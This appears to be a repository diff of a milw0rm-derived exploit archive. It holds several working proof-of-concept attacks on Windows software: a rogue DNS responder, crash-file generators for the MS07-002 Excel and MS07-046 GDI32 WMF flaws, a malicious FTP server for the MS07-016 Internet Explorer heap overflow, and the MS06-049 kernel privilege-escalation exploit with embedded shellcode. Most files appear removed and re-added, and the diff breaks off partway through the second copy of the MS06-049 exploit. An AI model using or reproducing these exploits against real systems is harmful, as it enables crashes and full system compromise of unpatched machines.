+               self.__create_socket(localhost)
+
+       def __create_socket(self, localhost):
+               self.host = localhost
+               self.port = 53
+               self.DNSsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+               self.DNSsocket.bind((self.host, self.port))
+               print 'Awaiting DNS queries'
+               print '====================\n'
+               while 1:
+                       self.__await_query()
+
+       def __await_query(self):
+               self.Query, self.Addr = self.DNSsocket.recvfrom(1024)
+               print 'Query from: ' + str(self.Addr)
+               self.TransactID = self.Query[0:2]
+               self.__find_type(self.Query[2:])
+
+       def __find_type(self, Question):
+               qType = struct.unpack('>H', Question[0:2])
+               if qType[0] == 256:
+                       self.__send_response(Question[10:-4])
+
+       def __send_response(self, sName):
+               self.response = self.TransactID
+               self.response += '\x85\x80' #Flags
+               self.response += '\x00\x01' #Questions
+               self.response += '\x00\x02' #Answer RR's
+               self.response += '\x00\x01' #Authority RR
+               self.response += '\x00\x00' #Additional RR
+
+               #QUERIES
+               #self.response += sName
+               self.response += '\x04\x74\x65\x73\x74\x07\x68\x61\x63\x6b\x65'
+               self.response += '\x72\x73\x03\x63\x6f\x6d\x00'
+               self.response += '\x00\xff' #request all  records
+               self.response += '\x00\x01' #inet class
+
+               #ANSWERS
+               #A record
+               self.response += '\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x07'
+               self.response += '\x00\x04\xc0\xa8\x00\x02' #A type record (IP add)
+               #TXT record
+               self.response += '\xc0\x0c\x00\x10\x00\x01\x00\x00\x00\x07'
+               self.response += '\x00\x18' #TXT record length
+               self.response += '\x08\x50\x52\x4f\x54\x4f\x43\x4f\x4c'
+               self.response += '\x00' #Zero length TXT RDATA
+               self.response += '\x00' #Zero length TXT RDATA
+               self.response += '\x08\x50\x52\x4f\x54\x4f\x43\x4f\x4c'
+               self.response += '\x00' #Zero length TXT RDATA
+               self.response += '\x00' #Zero length TXT RDATA
+               self.response += '\x01\x41'
+
+               #Authoritative Nameservers
+               self.response += '\xc0\x11\x00\x02\x00\x01\x00\x01\x51\x80'
+               self.response += '\x00\x0b\x08\x73\x63\x6f\x72\x70\x69\x6f'
+               self.response += '\x6e\xc0\x11'
+
+               self.DNSsocket.sendto(self.response, (self.Addr))
+
+if __name__ == '__main__':
+       try:
+               localhost = sys.argv[1]
+       except IndexError:
+               print 'Usage: %s <local ip for listening to DNS request>' % sys.argv[0]
+               sys.exit(-1)
+
+       D = DNSserver(localhost)
+
+# milw0rm.com [2006-12-09]

platforms/windows/dos/3193.py

@@ -1,101 +1,101 @@
-"""
-MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC
-
-######
-Author
-######
-LifeAsaGeek at gmail.com
-... and Microsoft said that vuln credit is for Greg MacManus of iDefense Labs
-
-########################
-Vulnerablity Description
-########################
-Bound error occurs when parsing Palette Record and it causes Heap Overflow
-check out here - http://picasaweb.google.com/lifeasageek/MS07002/photo?pli=1#5022146178204021506
-   which is generated by DarunGrim
-   ( and I want to say I'm not a person who made this analyzer ==; )
-
-#############
-Attack Vector
-#############
-Arbitary Data will be overwritten to the heap, but arbitary data is highly depends on the stack status !
-Result of heap overflow, you can overwrite 2 bytes to restricted range address ( not anywhere )
-In *CERTAIN* environment( such as open excel file which is already opened)
-    you can catch the flow by modify function pointer, but it doesn't have a reliablity at all
-Let me know if you have a good method to break down
-
-######
-Result
-######
-DOS
-
-#####
-Notes
-#####
-You should modify pyExcelerator module because it doesn't generate Palette Record
-
-pyExcelerator diff results would be like below
-
-diff h:\study\pyexcelerator-0.6.3a\pyExcelerator-0.6.3a\build\lib\pyExcelerator\BIFFRecords.py pyExcelerator\BIFFRecords.py
-1104a1105,1108
->     def __init__(self):
->         BiffRecord.__init__(self)
->         self._rec_data = pack('<H', 0x0038) # number of colours
->         self._rec_data += 'A' * 0xe0
-diff h:\study\pyexcelerator-0.6.3a\pyExcelerator-0.6.3a\build\lib\pyExcelerator\Workbook.py pyExcelerator\Workbook.py
-468,469c468
-<         result = ''
-<         return result
----
->         return BIFFRecords.PaletteRecord().get()
-
-!! THIS IS ONLY FOR EDUCATIONAL PURPOSE !!
- - 2007.01.25
-"""
-
-import sys, os
-from struct import *
-from pyExcelerator import *
-
-def CreateXLS():
-    w = Workbook()
-    ws = w.add_sheet('MS07-002 POC')
-    w.save( "before.xls")
-
-
-def ModifyXLS():
-    try:
-        f = open( "before.xls", "rb")
-    except:
-     print "File Open Error ! "
-     sys.exit(0)
-
-    str = f.read()
-    f.close()
-
-    #write to malformed xls file
-    f = open( "after.xls", "wb")
-
-    PaletteRecord = pack( "<HHH", 0x0092, 0x00E2, 0x0038)
-    NewPaletteRecord = pack( "<HHH", 0x0092, 0x00E2, 0x01FF)
-
-    palette_idx = str.find( PaletteRecord)
-
-    if palette_idx == -1:
-     print "Cannot find Palette Record"
-     sys.exit(0)
-
-    str = str.replace( PaletteRecord, NewPaletteRecord)
-    f.write( str)
-    f.close()
-
-if __name__ == "__main__":
-    print "==========================================================="
-    print "MS07-002 Malformed Palette Record vulnerability DOS POC "
-    print "Create POC Excel File after.xls"
-    print "by LifeAsaGeek at gmail.com"
-    print "==========================================================="
-    CreateXLS()
-    ModifyXLS() 
-
-# milw0rm.com [2007-01-25]
+"""
+MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC
+
+######
+Author
+######
+LifeAsaGeek at gmail.com
+... and Microsoft said that vuln credit is for Greg MacManus of iDefense Labs
+
+########################
+Vulnerablity Description
+########################
+Bound error occurs when parsing Palette Record and it causes Heap Overflow
+check out here - http://picasaweb.google.com/lifeasageek/MS07002/photo?pli=1#5022146178204021506
+   which is generated by DarunGrim
+   ( and I want to say I'm not a person who made this analyzer ==; )
+
+#############
+Attack Vector
+#############
+Arbitary Data will be overwritten to the heap, but arbitary data is highly depends on the stack status !
+Result of heap overflow, you can overwrite 2 bytes to restricted range address ( not anywhere )
+In *CERTAIN* environment( such as open excel file which is already opened)
+    you can catch the flow by modify function pointer, but it doesn't have a reliablity at all
+Let me know if you have a good method to break down
+
+######
+Result
+######
+DOS
+
+#####
+Notes
+#####
+You should modify pyExcelerator module because it doesn't generate Palette Record
+
+pyExcelerator diff results would be like below
+
+diff h:\study\pyexcelerator-0.6.3a\pyExcelerator-0.6.3a\build\lib\pyExcelerator\BIFFRecords.py pyExcelerator\BIFFRecords.py
+1104a1105,1108
+>     def __init__(self):
+>         BiffRecord.__init__(self)
+>         self._rec_data = pack('<H', 0x0038) # number of colours
+>         self._rec_data += 'A' * 0xe0
+diff h:\study\pyexcelerator-0.6.3a\pyExcelerator-0.6.3a\build\lib\pyExcelerator\Workbook.py pyExcelerator\Workbook.py
+468,469c468
+<         result = ''
+<         return result
+---
+>         return BIFFRecords.PaletteRecord().get()
+
+!! THIS IS ONLY FOR EDUCATIONAL PURPOSE !!
+ - 2007.01.25
+"""
+
+import sys, os
+from struct import *
+from pyExcelerator import *
+
+def CreateXLS():
+    w = Workbook()
+    ws = w.add_sheet('MS07-002 POC')
+    w.save( "before.xls")
+
+
+def ModifyXLS():
+    try:
+        f = open( "before.xls", "rb")
+    except:
+     print "File Open Error ! "
+     sys.exit(0)
+
+    str = f.read()
+    f.close()
+
+    #write to malformed xls file
+    f = open( "after.xls", "wb")
+
+    PaletteRecord = pack( "<HHH", 0x0092, 0x00E2, 0x0038)
+    NewPaletteRecord = pack( "<HHH", 0x0092, 0x00E2, 0x01FF)
+
+    palette_idx = str.find( PaletteRecord)
+
+    if palette_idx == -1:
+     print "Cannot find Palette Record"
+     sys.exit(0)
+
+    str = str.replace( PaletteRecord, NewPaletteRecord)
+    f.write( str)
+    f.close()
+
+if __name__ == "__main__":
+    print "==========================================================="
+    print "MS07-002 Malformed Palette Record vulnerability DOS POC "
+    print "Create POC Excel File after.xls"
+    print "by LifeAsaGeek at gmail.com"
+    print "==========================================================="
+    CreateXLS()
+    ModifyXLS() 
+
+# milw0rm.com [2007-01-25]

platforms/windows/dos/33860.html

@@ -13,9 +13,9 @@ CVE : unknown
 <body>
 
 <form id="testfm">
-<textarea id="child" value="a1" ></textarea>
+<textarea id="child" value="a1" >&lt;/textarea&gt;
 <input id="child2" type="checkbox" name="option2" value="a2">Test check<Br>
-<textarea id="child3" value="a2" ></textarea>
+<textarea id="child3" value="a2" >&lt;/textarea&gt;
 <input type="text" name="test1">
 </form>
 

platforms/windows/dos/3444.pl

@@ -1,42 +1,42 @@
-#!/usr/bin/perl
-
-# MS 07-016 FTP Server Response PoC
-# Usage: ./ms07016ftp.pl [LISTEN_IP]
-#
-# Tested Against: MSIE 6.02900.2180 (SP2)
-#
-# Details: The response is broken into buffers, either at length 1024,
-#                  or at '\r\n'. Each buffer is apended with \x00, without
-#                  bounds checking.  If the response is exctly 1024 characters
-#                  in length, you will overflow the heap with the string \x00.
-
-
-use IO::Socket;
-use strict;
-
-# Create listener
-my $ip=shift || '127.0.0.1';
-my $sock = IO::Socket::INET->new(Listen=>1,
-                                 LocalHost=>$ip,
-                                                     LocalPort=>'21',
-                                                             Proto=>'tcp');
-$sock or die ("Could not create listener.\nMake sure no FTP server is running, and you are running this as root.\n");
-
-# Wait for initial connection and send banner
-my $sock_in = $sock->accept();
-print $sock_in "220 waa waa wee waa\r\n";
-
-# Send response code with total lenght of response = 1024
-while (<$sock_in>){
-       my $response;
-       if($_ eq "USER") { $response="331 ";}
-       elsif($_ eq "PASS") { $response="230 ";}
-       elsif($_ eq "syst") { $response="215 ";}
-       elsif($_ eq "CWD") { $response="250 ";}
-       elsif($_ eq "PWD") { $response="230 ";}
-       else { $response="200 ";}
-       print $sock_in $response."A"x(1024-length($response)-2)."\r\n";
-}
-close($sock);
-
-# milw0rm.com [2007-03-09]
+#!/usr/bin/perl
+
+# MS 07-016 FTP Server Response PoC
+# Usage: ./ms07016ftp.pl [LISTEN_IP]
+#
+# Tested Against: MSIE 6.02900.2180 (SP2)
+#
+# Details: The response is broken into buffers, either at length 1024,
+#                  or at '\r\n'. Each buffer is apended with \x00, without
+#                  bounds checking.  If the response is exctly 1024 characters
+#                  in length, you will overflow the heap with the string \x00.
+
+
+use IO::Socket;
+use strict;
+
+# Create listener
+my $ip=shift || '127.0.0.1';
+my $sock = IO::Socket::INET->new(Listen=>1,
+                                 LocalHost=>$ip,
+                                                     LocalPort=>'21',
+                                                             Proto=>'tcp');
+$sock or die ("Could not create listener.\nMake sure no FTP server is running, and you are running this as root.\n");
+
+# Wait for initial connection and send banner
+my $sock_in = $sock->accept();
+print $sock_in "220 waa waa wee waa\r\n";
+
+# Send response code with total lenght of response = 1024
+while (<$sock_in>){
+       my $response;
+       if($_ eq "USER") { $response="331 ";}
+       elsif($_ eq "PASS") { $response="230 ";}
+       elsif($_ eq "syst") { $response="215 ";}
+       elsif($_ eq "CWD") { $response="250 ";}
+       elsif($_ eq "PWD") { $response="230 ";}
+       else { $response="200 ";}
+       print $sock_in $response."A"x(1024-length($response)-2)."\r\n";
+}
+close($sock);
+
+# milw0rm.com [2007-03-09]

platforms/windows/dos/4337.c

@@ -1,63 +1,63 @@
-/*
- * MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code
- 
- * by Hong Gil-Dong & Chun Woo-Chi
-
- * Yang yeon(?~1542), Korea
- * "I shall keep clenching my left fist unitl i see the real tao".
-
- * This POC is only for test. If an application read a malformed wmf 
- * file like this POC, the application will be crashed. If you apply 
- * this code, you can execute an arbitrary code.
- *
-
- * We tested this code on Windows XP SP2 Korean Edition 
- * (GDI32.dll version 5.1.2600.3099). But it will work well on other
- * systems.
- */
-
-#include <stdio.h>
-#include <windows.h>
-
-#define WMF_FILE "ms07-046.wmf"
-
-void usage(void);
-
-int main()
-{
-	
-	FILE *fp;
-
-	char wmf[] = "\x01\x00\x09\x00\x00\x03\x11\x00\x00\x00\x00\x00"\
-                 "\x05\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x13\x02"\
-                 "\x32\x00\x96\x00\x03\x00\x00\x00\x00\x00";
-	int i;
-	
-	HMETAFILE srcMeta;
-
-    usage();
-
-	if ((fp = fopen(WMF_FILE, "w")) == NULL) {
-                printf("File %s write error\n", WMF_FILE);
-                return 0;
-	}
-
-	for(i=0; i<sizeof(wmf)-1; i++)
-		fputc(wmf[i], fp);
-
-	fclose(fp);
-
-    srcMeta = GetMetaFile(WMF_FILE);
-    CopyMetaFile( srcMeta, NULL);
-
-    return 0;
-}
-
-void usage(void) 
-{
-   printf("MS07-046 Windows Meta File RecordParms Integer Overflow \n");
-   printf("Proof of Concept by Hong Gil-Dong & Chun Woo-Chi \n");
-      
-}
-
-// milw0rm.com [2007-08-29]
+/*
+ * MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code
+ 
+ * by Hong Gil-Dong & Chun Woo-Chi
+
+ * Yang yeon(?~1542), Korea
+ * "I shall keep clenching my left fist unitl i see the real tao".
+
+ * This POC is only for test. If an application read a malformed wmf 
+ * file like this POC, the application will be crashed. If you apply 
+ * this code, you can execute an arbitrary code.
+ *
+
+ * We tested this code on Windows XP SP2 Korean Edition 
+ * (GDI32.dll version 5.1.2600.3099). But it will work well on other
+ * systems.
+ */
+
+#include <stdio.h>
+#include <windows.h>
+
+#define WMF_FILE "ms07-046.wmf"
+
+void usage(void);
+
+int main()
+{
+	
+	FILE *fp;
+
+	char wmf[] = "\x01\x00\x09\x00\x00\x03\x11\x00\x00\x00\x00\x00"\
+                 "\x05\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x13\x02"\
+                 "\x32\x00\x96\x00\x03\x00\x00\x00\x00\x00";
+	int i;
+	
+	HMETAFILE srcMeta;
+
+    usage();
+
+	if ((fp = fopen(WMF_FILE, "w")) == NULL) {
+                printf("File %s write error\n", WMF_FILE);
+                return 0;
+	}
+
+	for(i=0; i<sizeof(wmf)-1; i++)
+		fputc(wmf[i], fp);
+
+	fclose(fp);
+
+    srcMeta = GetMetaFile(WMF_FILE);
+    CopyMetaFile( srcMeta, NULL);
+
+    return 0;
+}
+
+void usage(void) 
+{
+   printf("MS07-046 Windows Meta File RecordParms Integer Overflow \n");
+   printf("Proof of Concept by Hong Gil-Dong & Chun Woo-Chi \n");
+      
+}
+
+// milw0rm.com [2007-08-29]

platforms/windows/local/2412.c

@@ -1,368 +1,368 @@
-/*
-    MS06-049 Windows ZwQuerySystemInformation Local Privilege Escalation Vulnerability Exploit
-            Created by SoBeIt
-
-    Main file of exploit
-
-    Tested on:
-
-    Windows 2000 PRO SP4 Chinese
-    Windows 2000 PRO SP4 Rollup 1 Chinese
-    Windows 2000 PRO SP4 English
-    Windows 2000 PRO SP4 Rollup 1 English
-
-    Usage:ms06-049.exe
-*/
-
-#include <windows.h>
-#include <stdio.h>
-
-#define NTSTATUS    int
-#define ProcessBasicInformation    0
-#define SystemModuleInformation 11
-    
-typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
-typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(HANDLE, ULONG, PVOID, ULONG, PULONG);
-typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);
-
-ZWVDMCONTROL    ZwVdmControl;
-ZWQUERYINFORMATIONPROCESS    ZwQueryInformationProcess;
-ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
-
-typedef struct _PROCESS_BASIC_INFORMATION {
-      NTSTATUS ExitStatus;
-      PVOID PebBaseAddress;
-      ULONG AffinityMask;
-      ULONG BasePriority;
-      ULONG UniqueProcessId;
-      ULONG InheritedFromUniqueProcessId;
-} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;
-
-typedef struct _SYSTEM_MODULE_INFORMATION {
-    ULONG Reserved[2];
-    PVOID Base;
-    ULONG Size;
-    ULONG Flags;
-    USHORT Index;
-    USHORT Unknow;
-    USHORT LoadCount;
-    USHORT ModuleNameOffset;
-    char ImageName[256];    
-} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
-
-unsigned char kfunctions[64][64] = 
-{
-                            //ntoskrnl.exe
-    {"ZwTerminateProcess"},
-    {""},
-};
-
-unsigned char shellcode[] = 
-        "\x90\x60\x9c\xe9\xd1\x00\x00\x00\x5f\x4f\x47\x33\xc0\x66\x81\x3f"
-        "\x90\xcc\x75\xf6\x40\x40\x66\x81\x3c\x07\xcc\x90\x75\xec\x83\xc7"
-        "\x04\xbe\x38\xf0\xdf\xff\x8b\x36\xad\xad\x48\x81\x38\x4d\x5a\x90"
-        "\x00\x75\xf7\x95\x8b\xf7\x6a\x01\x59\xe8\x56\x00\x00\x00\xe2\xf9"
-        "\xbb\x24\xf1\xdf\xff\x8b\x1b\x8b\x43\x44\xb9\x08\x00\x00\x00\xe8"
-        "\x2c\x00\x00\x00\x8b\xd0\x8b\x4e\x04\xe8\x22\x00\x00\x00\x8b\x8a"
-        "\x2c\x01\x00\x00\x89\x88\x2c\x01\x00\x00\x56\x8b\x7e\x0c\x8b\x4e"
-        "\x10\x8b\x76\x08\xf3\xa4\x5e\x33\xc0\x50\x50\xff\x16\x9d\x61\xc3"
-        "\x8b\x80\xa0\x00\x00\x00\x2d\xa0\x00\x00\x00\x39\x88\x9c\x00\x00"
-        "\x00\x75\xed\xc3\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56"
-        "\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe"
-        "\x10\x85\xd2\x74\x08\xc1\xcb\x07\x03\xda\x40\xeb\xf1\x3b\x1f\x75"
-        "\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd"
-        "\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x2a\xff\xff\xff\x90\x90"
-
-        "\x90\xcc\xcc\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcc\x90\x90\xcc";
-
-void ErrorQuit(char *msg)
-{
-    printf("%s:%x\n", msg, GetLastError());
-    ExitProcess(0);
-}
-
-ULONG ComputeHash(char *ch)
-{
-    ULONG ret = 0;
-
-    while(*ch)
-    {
-        ret = ((ret << 25) | (ret >> 7)) + *ch++;
-    }
-
-    return ret;
-}
-
-ULONG RVA2Offset(ULONG RVA, PIMAGE_SECTION_HEADER pSectionHeader, ULONG Sections)
-{    
-    ULONG i;
-    
-    if(RVA < pSectionHeader[0].PointerToRawData)
-        return RVA;
-
-    for(i = 0; i < Sections; i++)
-    {   
-        if(RVA >= pSectionHeader[i].VirtualAddress &&
-           RVA < pSectionHeader[i].VirtualAddress + pSectionHeader[i].SizeOfRawData)           
-           return (RVA - pSectionHeader[i].VirtualAddress + pSectionHeader[i].PointerToRawData);
-    }
-    
-    return 0;
-}
-
-ULONG Offset2RVA(ULONG Offset, PIMAGE_SECTION_HEADER pSectionHeader, ULONG Sections)
-{   
-    ULONG i;
-    
-    if(Offset < pSectionHeader[0].PointerToRawData)
-        return Offset;
-    
-    for(i = 0; i < Sections; i++)
-    {
-        if(Offset >= pSectionHeader[i].PointerToRawData &&
-           Offset < pSectionHeader[i].PointerToRawData + pSectionHeader[i].SizeOfRawData)
-           return (Offset - pSectionHeader[i].PointerToRawData + pSectionHeader[i].VirtualAddress);
-    }
-    
-    return 0;
-}
-
-void GetFunction()
-{
-    HANDLE    hNtdll;
-    
-    hNtdll = LoadLibrary("ntdll.dll");
-    if(hNtdll == NULL)
-        ErrorQuit("LoadLibrary failed.\n");
-        
-    ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");
-    if(ZwVdmControl == NULL)
-        ErrorQuit("GetProcAddress failed.\n");
-        
-    ZwQueryInformationProcess = (ZWQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, "ZwQueryInformationProcess");
-    if(ZwQueryInformationProcess == NULL)
-        ErrorQuit("GetProcAddress failed.\n");
-        
-    ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
-    if(ZwQuerySystemInformation == NULL)
-        ErrorQuit("GetProcessAddress failed.\n");
-        
-    FreeLibrary(hNtdll);
-}
-
-ULONG GetKernelBase()
-{
-    ULONG    i, Byte, ModuleCount;
-    PVOID    pBuffer;
-    PSYSTEM_MODULE_INFORMATION    pSystemModuleInformation;
-    PCHAR    pName;
-    
-    ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
-        
-    if((pBuffer = malloc(Byte)) == NULL)
-        ErrorQuit("malloc failed.\n");
-        
-    if(ZwQuerySystemInformation(SystemModuleInformation, pBuffer, Byte, &Byte))
-        ErrorQuit("ZwQuerySystemInformation failed\n");
-    
-    ModuleCount = *(PULONG)pBuffer;
-    pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)pBuffer + sizeof(ULONG));
-    for(i = 0; i < ModuleCount; i++)
-    {
-        if((pName = strstr(pSystemModuleInformation->ImageName, "ntoskrnl.exe")) != NULL)
-        {
-            free(pBuffer);    
-            return (ULONG)pSystemModuleInformation->Base;
-        }
-        
-        pSystemModuleInformation++;
-    }
-        
-    free(pBuffer);
-    return 0;
-}
-
-int main(int argc, char *argv[])
-{
-    PULONG    pStoreBuffer, pNamesArray, pFunctionsArray, pShellcode, pRestoreBuffer;
-    PUCHAR    pBase;
-    PCHAR        pName;
-    PUSHORT        pOrdinals;
-    PIMAGE_NT_HEADERS    pHeader;
-    PIMAGE_EXPORT_DIRECTORY    pExport;
-    PIMAGE_SECTION_HEADER pSectionHeader;
-    PROCESS_BASIC_INFORMATION pbi;
-    SYSTEM_MODULE_INFORMATION    smi;
-    char        DriverName[256];
-    ULONG        Byte, FileSize, len, i, j, k, Count, BaseAddress, Value, KernelBase, buf[64], HookAddress, Temp, Sections;
-    USHORT    index;
-    HANDLE    hDevice, hFile, hFileMap;
-
-    printf("\n MS06-049 Windows ZwQuerySystemInformation Local Privilege Escalation Vulnerability Exploit \n\n");
-    printf("\t Create by SoBeIt. \n\n");
-    if(argc != 1)
-    {
-        printf(" Usage:%s \n\n", argv[0]);
-        return 1;
-    }
-
-    GetFunction();
-
-    if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL))
-        ErrorQuit("ZwQueryInformationProcess failed\n");
-    
-    KernelBase = GetKernelBase();
-    if(!KernelBase)
-        ErrorQuit("Unable to get kernel base address.\n");
-        
-    printf("Kernel base address: %x\n", KernelBase);
-
-    pRestoreBuffer = malloc(0x100);
-    if(pRestoreBuffer == NULL)
-        ErrorQuit("malloc failed.\n");
-    
-    pStoreBuffer = VirtualAlloc(NULL, 0x1001000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
-    if(pStoreBuffer == NULL)
-        ErrorQuit("VirtualAlloc failed.\n");
-        
-    printf("Allocated address:%x\n", pStoreBuffer);
-    
-    if(!GetSystemDirectory((PUCHAR)pStoreBuffer, 256))
-        ErrorQuit("GetSystemDirectory failed.\n");
-
-    strcat((PUCHAR)pStoreBuffer, "\\ntoskrnl.exe");
-    hFile = CreateFile((PUCHAR)pStoreBuffer, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-    if(hFile == INVALID_HANDLE_VALUE)
-    {
-        hFile = CreateFile("ntoskrnl.exe", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-        if(hFile == INVALID_HANDLE_VALUE)
-            ErrorQuit("CreateFile failed.\n");
-    }
-
-    if((FileSize = GetFileSize(hFile, NULL)) == 0xffffffff)
-        ErrorQuit("GetFileSize failed.\n");
-
-    printf("File size:%x\n", FileSize);
-    pBase = (PUCHAR)VirtualAlloc(NULL, FileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
-    if(pBase == NULL)
-        ErrorQuit("VirtualAlloc failed.\n");
-        
-    if(!ReadFile(hFile, pBase, FileSize, &Byte, NULL))
-        ErrorQuit("ReadFile failed.\n");
-
-    pHeader = (PIMAGE_NT_HEADERS)(pBase + ((PIMAGE_DOS_HEADER)pBase)->e_lfanew);
-    pSectionHeader = (PIMAGE_SECTION_HEADER)((PUCHAR)(&pHeader->OptionalHeader) + pHeader->FileHeader.SizeOfOptionalHeader);
-    Sections= pHeader->FileHeader.NumberOfSections;
-
-    pExport = (PIMAGE_EXPORT_DIRECTORY)(pBase + 
-        RVA2Offset(pHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress,
-        pSectionHeader,
-        Sections
-        ));
-
-    pNamesArray = (PULONG)(pBase + 
-                    RVA2Offset(pExport->AddressOfNames,
-                        pSectionHeader,
-                        Sections));
-                        
-    pFunctionsArray = (PULONG)(pBase +                        
-                    RVA2Offset(pExport->AddressOfFunctions,
-                        pSectionHeader,
-                        Sections));
-                        
-    pOrdinals = (PUSHORT)(pBase + 
-                    RVA2Offset(pExport->AddressOfNameOrdinals,
-                        pSectionHeader,
-                        Sections));
-                        
-    len = strlen("NtVdmControl");
-    for(i = 0; i < pExport->NumberOfNames; i++)
-    {
-        pName = pBase + RVA2Offset(pNamesArray[i], pSectionHeader, Sections);
-        if(!strncmp(pName, "NtVdmControl", len))
-            break;
-    }
-
-    if(i > pExport->NumberOfFunctions)
-        ErrorQuit("Some error occured.\n");
-
-    index = pOrdinals[i]; 
-    HookAddress = pFunctionsArray[index] + KernelBase;
-    memcpy((PUCHAR)pRestoreBuffer, pBase + pFunctionsArray[index] - 1, 0x10);
-    printf("%s Address:%x\n", "NtVdmControl", HookAddress);
-    
-    pShellcode = (PULONG)shellcode;
-    for(k = 0; pShellcode[k++] != 0x90cccc90; )
-                ;
-
-    for(j = 0; kfunctions[j][0] != '\x0'; j++)
-        buf[j] = ComputeHash(kfunctions[j]);
-
-    buf[j++] = pbi.InheritedFromUniqueProcessId;
-    buf[j++] = (ULONG)pRestoreBuffer;
-    buf[j++] = HookAddress - 1;
-    buf[j++] = 0x10;    
-
-    memcpy((char *)(pShellcode + k), (char *)buf, j * 4);
-    
-    Temp = 0;
-    for(i = 0; i < 7; i++)
-    {
-        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
-        Byte = Byte / sizeof(SYSTEM_MODULE_INFORMATION);
-        Temp += Byte;
-    }
-    
-    Byte = Temp / 7;
-    printf("Single value:%x\n", Byte);
-    Value = (0xe9 << 8) & 0xff00;
-    printf("Jump value:%x\n", Value);
-    printf("Base value:%x\n", pRestoreBuffer[0]);
-    for(Count = 0; ; Count++)
-    {
-        if(((pRestoreBuffer[0] + Count * Byte) & 0xff00) == Value)
-            break;    
-    }
-    
-    printf("Need value generated:%x\n", pRestoreBuffer[0] + Count * Byte);
-    printf("Count value:%x\n", Count);
-    for(i = 0; i < Count; i ++)
-        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)(HookAddress - 1), 0, &Byte);
-
-    Temp = 0;
-    for(i = 0; i < 7; i++)
-    {
-        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
-        Byte = Byte / sizeof(SYSTEM_MODULE_INFORMATION);
-        Temp += Byte;
-    }
-    
-    Byte = Temp / 7;
-    printf("Single value:%x\n", Byte);
-    Value = (((ULONG)pStoreBuffer + 0x800000 - HookAddress) >> 16) & 0xfff0;
-    printf("Jump value:%x\n", Value);
-    printf("Base value:%x\n", pRestoreBuffer[1]);
-    for(Count = 0; ; Count++)
-    {
-        if(((pRestoreBuffer[1] + Count * Byte) & 0xfff0) == Value)
-            break;
-    }
-
-    printf("Need value generated:%x\n", pRestoreBuffer[1] + Count * Byte);
-    printf("Count value:%x\n", Count);
-    for(i = 0; i < Count; i ++)
-        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)(HookAddress + 3), 0, &Byte);
-
-    memset(pStoreBuffer, 0x90, 0x1001000);
-    memcpy((PUCHAR)pStoreBuffer + 0x1000000, shellcode, sizeof(shellcode));
-        
-    CloseHandle(hFile);
-
-    printf("Exploitation finished.\n");
-    ZwVdmControl(0, NULL);
-    
-    return 1;
-}
-
-// milw0rm.com [2006-09-21]
+/*
+    MS06-049 Windows ZwQuerySystemInformation Local Privilege Escalation Vulnerability Exploit
+            Created by SoBeIt
+
+    Main file of exploit
+
+    Tested on:
+
+    Windows 2000 PRO SP4 Chinese
+    Windows 2000 PRO SP4 Rollup 1 Chinese
+    Windows 2000 PRO SP4 English
+    Windows 2000 PRO SP4 Rollup 1 English
+
+    Usage:ms06-049.exe
+*/
+
+#include <windows.h>
+#include <stdio.h>
+
+#define NTSTATUS    int
+#define ProcessBasicInformation    0
+#define SystemModuleInformation 11
+    
+typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
+typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(HANDLE, ULONG, PVOID, ULONG, PULONG);
+typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);
+
+ZWVDMCONTROL    ZwVdmControl;
+ZWQUERYINFORMATIONPROCESS    ZwQueryInformationProcess;
+ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
+
+typedef struct _PROCESS_BASIC_INFORMATION {
+      NTSTATUS ExitStatus;
+      PVOID PebBaseAddress;
+      ULONG AffinityMask;
+      ULONG BasePriority;
+      ULONG UniqueProcessId;
+      ULONG InheritedFromUniqueProcessId;
+} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;
